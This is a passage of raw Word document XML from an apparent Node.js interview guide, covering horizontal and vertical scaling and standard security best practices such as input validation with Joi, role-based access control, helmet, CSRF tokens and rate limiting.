          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Horizontal Scaling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy multiple instances of your app and use a load balancer (e.g., AWS ELB, Nginx) to distribute traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43737F05" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vertical Scaling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Increase the server's resources (CPU, RAM) as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534715F8" w14:textId="77777777" w:rsidR="00AE64CF" w:rsidRPr="00DA2F32" w:rsidRDefault="00AE64CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5D20F3"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40" w:name="_Toc178383223"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q39. What are the best practices for securing a Node.js application?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="4F13C4B9"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1. Keep Dependencies Up to Date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446EC76C" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use npm audit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regularly run npm audit to check for vulnerabilities in your dependencies. Fix issues using npm audit fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E54862" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitor Dependencies:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use tools like Snyk or Dependabot to monitor dependencies for security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F16C2C0"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2. Avoid Installing Unnecessary Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A0FD9" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Only install the packages you need. Each additional dependency increases the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397ED857" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regularly review and prune unused packages with npm prune.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E59A5"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3. Environment Variables and Sensitive Data Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D01F931" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Environment Variables:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Store sensitive information like database credentials, API keys, and secret tokens in environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC19602" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Never Hardcode Secrets:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid hardcoding sensitive information in your codebase. Use a .env file locally and configure environment variables on your production server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A48FF7" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure .env Files:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exclude .env files from version control using .gitignore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1433A3EA"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4. Input Validation and Sanitization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C240FCB" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Validate User Input:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always validate and sanitize user input to prevent injection attacks (e.g., SQL injection, XSS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7E92AC" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Libraries for Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use libraries like joi, express-validator, or validator to enforce strict input validation rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A77FEE"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Joi = require('joi');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E3AA72"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A0EC136"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schema = Joi.object({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531720BD"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username: Joi.string().alphanum().min(3).max(30).required(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394FD09F"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email: Joi.string().email().required(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603350F"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4175D5D"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0F657541"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error } = schema.validate(req.body);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250087E"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if (error) return res.status(400).send(error.details[0].message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1362A75D"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5. Authentication and Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABB493E" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Strong Passwords:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce strong password policies and hash passwords using a secure algorithm like bcrypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF59AAE" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement Multi-Factor Authentication (MFA):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add an extra layer of security by requiring MFA for sensitive actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223BBFCF" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Role-Based Access Control (RBAC):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement RBAC to restrict access based on user roles and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A1D52" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B786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Protect routes based on user roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E14D283"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authorize(roles = []) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDCE3EC"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(req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5820CA25"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(!roles.includes(req.user.role)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF7DF8E"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res.status(403).json({ message: 'Forbidden' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C483CED"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A563122"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A7A172"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4E95FD0"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80DA0C0"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DDCDF0E"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app.get('/admin', authorize(['admin']), (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D661F36"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res.send('Welcome, Admin!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C82FA9"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7D94674"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6. Use HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4570A4BC" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Always serve your application over HTTPS to encrypt data in transit. Use SSL certificates, which can be obtained for free from Let’s Encrypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C9CE9" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Redirect all HTTP requests to HTTPS to ensure secure communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACC5D9B"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7. Secure HTTP Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FB74F" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use the helmet middleware to set HTTP headers that help protect your app from well-known web vulnerabilities (e.g., XSS, clickjacking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FAE32F"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8. Prevent Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA3E3E" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Escape output in your views to prevent XSS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0262A4E6" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Content Security Policy (CSP) to define which sources are allowed to load resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1721DDFD"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app.use(helmet.contentSecurityPolicy({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094DE15F"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directives: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB9E4E"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defaultSrc: ["'self'"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D84D0EF"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scriptSrc: ["'self'", "trustedscripts.com"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5015F4"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A66DCCD"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7316FEC"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9. Prevent Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FEE7DB" w14:textId="660D0B4F" w:rsidR="004E1FE0" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use CSRF tokens to protect against CSRF attacks. The csurf middleware can be used with Express to generate and validate tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24050E9F" w14:textId="7C44C9CE"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csurf = require('csurf');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710EBBBB"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app.use(csurf());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44EA32"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10. Rate Limiting and Brute Force Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D96458" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement rate limiting to prevent brute-force attacks on authentication endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB5831" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use express-rate-limit to set limits on repeated requests from the same IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E15E1"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rateLimit = require('express-rate-limit');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1A1726"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CF718C5"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limiter = rateLimit({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E2318"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windowMs: 15 * 60 * 1000, // 15 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28152E5B"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max: 100, // limit each IP to 100 requests per windowMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA01C58"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C6C3A27"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6EFFD05E"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app.use('/api/', limiter);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E99D0F"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11. Use a Reverse Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3B2C7B" w14:textId="77777777" w:rsidR="004B7868" w:rsidRPr="00DA2F32" w:rsidRDefault="004B7868" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deploy your Node.js application behind a reverse proxy like Nginx. A reverse proxy can handle SSL termination, load balancing, and additional security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182630F8"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12. Logging and Monitoring</w:t>
